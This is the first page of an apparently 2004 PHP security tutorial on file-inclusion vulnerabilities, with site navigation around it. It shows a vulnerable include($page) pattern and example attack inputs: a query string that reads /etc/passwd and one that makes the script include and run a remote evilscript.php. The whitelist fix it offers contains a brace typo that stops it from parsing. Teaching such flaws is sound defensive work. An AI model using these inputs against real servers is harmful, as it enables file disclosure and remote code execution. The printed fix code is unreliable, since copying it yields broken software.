Administration
AJAX
Apache
BrainDump
DHTML
Flash
Java
JavaScript
Multimedia
MySQL
Oracle
Perl
PHP
Practices
Python
Reviews
Security
Style-Sheets
Web Services
XML
Zend
Zope

Forums Sitemap
IBM® developerWorks
Sun Developer Network

E-Commerce Hosting
Linux Web Hosting
Managed Hosting
Small Business Hosting
Mobile Linux
App Generation ROI
VPS Hosting

Weekly Newsletter
Developer Updates
Free Website Content

Articles

Forums

All Feeds

Write For Us Get Paid

Request Media Kit

Site Map

Privacy Policy
Support

USERNAME

PASSWORD

>>> SIGN UP!

Lost Password?

PHP

RSS

PHP Security Mistakes

By: Dave Clark	Search For More Articles! Disclaimer Author Terms
Rating: / 293
2004-06-09

Table of Contents:

PHP Security Mistakes

Tips 2, 3

Tip 4

Tips 5, 6

	ADD THIS ARTICLE TO:
	Del.ici.ous	Digg
	Blink	Simpy
	Google	Spurl
	Y! MyWeb	Furl

Email Me Similar Content When Posted

Add Developer Shed Article Feed To Your Site

Email Article To Friend

Print Version Of Article

PDF Version Of Article

PHP Security Mistakes

(Page 1 of 4 )

The purpose of this document is to inform PHP programmers of common security mistakes that can be overlooked in PHP scripts. While many of the following concepts may appear to be common sense, they are unfortunately not always common practice. After applying the following practices to your coding, you will be able to eliminate the vast majority of security holes that plague many scripts. Many of these security holes have been found in widely-used open source and commercial PHP scripts in the past.

The most important concept to learn from this article is that you should never trust the user to input exactly what is expected. The way most PHP scripts are compromised is by entering unexpected data to exploit security holes inadvertantly left in the script.

Always keep the following principles in mind when designing your scripts:

1. Never include, require, or otherwise open a file with a filename based on user input, without thoroughly checking it first.

Take the following example:

if(isset($page))
{
include($page);
}

Since there is no validation being done on $page, a malicious user could hypothetically call your script like this (assuming register_globals is set to ON):

script.php?page=/etc/passwd

Therefore causing your script to include the servers /etc/passwd file. When a non PHP file is include()'d or require()'d, it's displayed as HTML/Text, not parsed as PHP code.

On many PHP installations, the include() and require() functions can include remote files. If the malicious user were to call your script like this:

script.php?page=http://mysite.com/evilscript.php

He would be able to have evilscript.php output any PHP code that he or she wanted your script to execute. Imagine if the user sent code to delete content from your database or even send sensitive information directly to the browser.

Solution: validate the input. One method of validation would be to create a list of acceptable pages. If the input did not match any of those pages, an error could be displayed.

$pages = array('index.html', 'page2.html', 'page3.html');
if( in_array($page, $pages) )
{
include($page);
{
else
{
die("Nice Try.");
}

Next: Tips 2, 3 >>

More PHP Articles
More By Dave Clark

Comments On: PHP Security Mistakes
· Great article PHP security is getting bigger every day I've personally been using...

>>> Post your comment now!

PHP ARTICLES

- Working With Different Namespaces in PHP 5
- User Management Explained: Overview
- Using Namespaces in PHP 5
- Database Security: Guarding Against SQL Inje...
- Building a Modular Exception Class in PHP 5
- Database and Password Security for Web Appli...
- Handling MySQL Data Set Failures in PHP 5
- Building Site Registration for Web Applicati...
- Intercepting Customized Exceptions in PHP 5
- Securing Your Web Application Against Attacks
- Sub Classing Exceptions in PHP 5
- Authentication for Web Application Security
- Building a Content Management System with Co...
- Filters and Login Systems for Web Applicatio...
- Working with the Email Class in Code Igniter
Find More PHP Articles